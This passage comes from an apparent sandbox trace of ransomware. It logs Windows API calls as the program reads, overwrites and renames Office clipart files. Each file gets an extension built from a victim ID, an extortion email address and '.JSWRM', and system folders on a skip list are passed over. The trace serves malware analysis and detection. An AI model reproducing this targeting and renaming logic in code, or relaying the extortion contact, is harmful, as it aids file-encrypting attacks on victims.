lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0089.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cf48 [0089.096] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0089.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cf48 | out: hHeap=0x1e0000) returned 1 [0089.096] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.096] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296277.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296277.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0089.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0089.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0089.097] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x1088e, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0296279.WMF", cAlternateFileName="")) returned 1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2=".") returned 1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="..") returned 1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="...") returned 1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="windows") returned -1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="recovery") returned -1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="perflogs") returned -1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="documents and settings") returned 1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="system volume information") returned -1 [0089.097] lstrcmpiW (lpString1="J0296279.WMF", lpString2="msocache") returned -1 [0089.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0089.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296279.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296279.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0296279.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0089.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0089.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296279.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296279.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0296279.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0089.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0089.097] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210320 | out: hHeap=0x1e0000) returned 1 [0089.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.097] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.097] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0089.097] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.098] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=67726) returned 1 [0089.098] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.098] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10880) returned 0x24d210 [0089.098] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x10880, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x10880, lpOverlapped=0x0) returned 1 [0089.115] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.115] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x10880, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x10880, lpOverlapped=0x0) returned 1 [0089.115] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.116] CloseHandle (hObject=0x314) returned 1 [0089.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210b70 [0089.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0089.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0089.116] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0089.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0089.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0089.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0089.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0089.117] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296279.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296279.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0089.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210b70 | out: hHeap=0x1e0000) returned 1 [0089.117] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0089.117] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3e0b76, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3e0b76, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x107ec, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0296288.WMF", cAlternateFileName="")) returned 1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2=".") returned 1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="..") returned 1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="...") returned 1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="windows") returned -1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="recovery") returned -1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="perflogs") returned -1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="documents and settings") returned 1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="system volume information") returned -1 [0089.118] lstrcmpiW (lpString1="J0296288.WMF", lpString2="msocache") returned -1 [0089.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0089.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296288.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296288.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0296288.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0089.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0089.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296288.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0296288.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0296288.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0089.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ca0 [0089.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0089.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.118] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0089.118] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.119] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=67564) returned 1 [0089.119] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x107e0) returned 0x24d210 [0089.119] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x107e0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x107e0, lpOverlapped=0x0) returned 1 [0089.125] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.125] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x107e0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x107e0, lpOverlapped=0x0) returned 1 [0089.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.126] CloseHandle (hObject=0x314) returned 1 [0089.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0089.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0089.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0089.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0089.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0089.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247f60 [0089.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0089.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0089.127] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0296288.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0296288.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247f60 | out: hHeap=0x1e0000) returned 1 [0089.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210450 | out: hHeap=0x1e0000) returned 1 [0089.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0089.128] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x59ce, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0297229.WMF", cAlternateFileName="")) returned 1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2=".") returned 1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="..") returned 1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="...") returned 1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="windows") returned -1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="recovery") returned -1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="perflogs") returned -1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="documents and settings") returned 1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="$RECYCLE.BIN") returned 1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="system volume information") returned -1 [0089.128] lstrcmpiW (lpString1="J0297229.WMF", lpString2="msocache") returned -1 [0089.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241218 [0089.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297229.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297229.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297229.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241218 | out: hHeap=0x1e0000) returned 1 [0089.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0089.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297229.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0089.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0297229.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0297229.WMF", lpUsedDefaultChar=0x0) returned 12 [0089.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0089.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0089.128] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ca0 | out: hHeap=0x1e0000) returned 1 [0089.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0089.128] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0089.128] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210158 [0089.128] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0089.129] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=22990) returned 1 [0089.129] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.129] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x59c0) returned 0x24d210 [0089.130] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x59c0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x59c0, lpOverlapped=0x0) returned 1 [0089.133] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0089.133] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x59c0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x59c0, lpOverlapped=0x0) returned 1 [0089.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0089.133] CloseHandle (hObject=0x314) returned 1 [0089.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0089.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0089.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0089.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0089.133] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0089.133] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0089.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0089.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a270 [0089.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a270, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0089.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a270 | out: hHeap=0x1e0000) returned 1 [0089.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d1e8 [0089.134] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2477a0 [0089.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d1e8 | out: hHeap=0x1e0000) returned 1 [0089.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0089.134] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0297229.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0297229.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0089.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2477a0 | out: hHeap=0x1e0000) returned 1 [0089.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0089.134] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210158 | out: hHeap=0x1e0000) returned 1 [0089.135] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xf3ba90e, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xf3ba90e, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xf3e0b76, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3d24, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0297269.WMF", cAlternateFileName="")) returned 1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2=".") returned 1 [0089.135] lstrcmpiW (lpString1="J0297269.WMF", lpString2="..") returned 1 [0089.135] lstrcmpiW 